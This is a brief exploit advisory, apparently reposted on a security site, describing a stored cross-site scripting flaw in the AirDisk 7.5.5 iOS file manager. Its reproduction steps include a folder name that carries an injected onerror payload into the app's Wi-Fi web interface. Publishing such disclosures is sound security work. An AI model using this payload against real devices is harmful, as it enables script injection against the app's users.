Exploit/Advisories
Published on September 10th, 2022 📆 | 3104 Views ⚑
0AirDisk 7.5.5 Cross Site Scripting – Torchsec
# Exploit Title: AirDisk 7.5.5 File Manager Stored XSS
# Date: Sep 8, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424
# Software Link:
https://apps.apple.com/us/app/airdisk-file-manager/id566530748
# Version: 7.5.5
# Tested on: iPhone ios 15.61/ Starting the server ( File Transfer > Wi-fi File Transfer )
2/ Go to browser
3/ Enter the address showing on app eg: http://192.168.1.187:8080
4/ Create a folder with the name: rose'">onerror=alert(document.location)>
5/ Refresh.
Gloss